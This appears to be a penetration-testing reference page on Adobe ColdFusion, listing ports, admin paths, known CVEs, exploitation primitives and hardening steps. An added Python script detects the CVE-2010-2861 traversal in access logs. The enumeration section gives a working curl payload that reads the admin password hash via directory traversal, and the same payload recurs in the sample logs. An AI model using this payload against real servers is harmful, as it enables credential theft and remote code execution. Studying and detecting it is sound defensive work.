Adobe ColdFusion
aka CFML, CFIDE
Java web app platform on 8500. A directory-traversal CVE leaks the admin hash, and deserialization / unauthenticated upload CVEs give RCE; the admin panel lives at /CFIDE.
Ports
| Port | Proto | Notes |
|---|---|---|
| 8500 | tcp | ColdFusion built-in web server |
| 80 | tcp | HTTP (when fronted by IIS/Apache) |
Fingerprint
- /CFIDE/administrator/index.cfm admin login
- .cfm extension and ColdFusion error pages reveal the version
Key files
| Path | Holds | Sensitive |
|---|---|---|
| password.properties | the admin password hash | sensitive |
| CFIDE/ | admin interface and component browser | |
Default / weak creds
admin (hash recoverable via CVE-2010-2861)
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2010-2861 | Directory traversal / LFI to read password.properties (admin hash) |
| CVE-2017-3066 | Java deserialization RCE |
| CVE-2018-15961 | Unauthenticated file upload RCE |
Exploitation primitives
- CVE-2010-2861: traverse to read password.properties, then crack/replay the admin hash
- CVE-2017-3066 deserialization and CVE-2018-15961 unauth upload for direct RCE
- As admin: scheduled tasks and the component browser run code
Overview
ColdFusion runs CFML apps on a JVM, usually on 8500. It has a long history of high-impact CVEs, from an LFI that leaks the admin hash to unauthenticated upload RCE.
Enumeration
```bash
curl -s http://<TARGET>:8500/CFIDE/administrator/index.cfm | grep -i version
# CVE-2010-2861 hash read:
curl --path-as-is "http://<TARGET>:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"
```
Hardening
Patch to a current release, restrict /CFIDE access, and change the admin password.
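
A detection-side check for the CVE-2010-2861 request shown under Enumeration, as an added example that is not part of the original page: it scans web access-log lines for /CFIDE/ requests whose `locale` parameter carries path traversal or a null byte. The common/combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a common/combined access-log entry: "METHOD target HTTP/x"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_locale_traversal(target):
    """True if a /CFIDE/ request carries traversal or a null byte in `locale`."""
    parts = urlsplit(target)
    if "/cfide/" not in fully_decode(parts.path).lower():
        return False
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() != "locale":
            continue
        value = fully_decode(value).replace("\\", "/")
        if "../" in value or "\x00" in value:
            return True
    return False

def suspicious_lines(log_lines):
    """Return the log lines whose request matches the traversal pattern."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match and is_locale_traversal(match.group(1)):
            hits.append(line)
    return hits

# Constructed sample log lines (documentation addresses, not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1" 200 812',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /CFIDE/administrator/enter.cfm?locale=..%2F..%2F..%2Flib%2Fpassword.properties%00en HTTP/1.1" 200 812',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for hit in suspicious_lines(SAMPLE_LOG):
        print(hit)
```

A hit means the request was attempted, not that it succeeded; a 200 response with an unusually small body on `enter.cfm` is the follow-up to check, and any hit on an unpatched server is a reason to rotate the admin password.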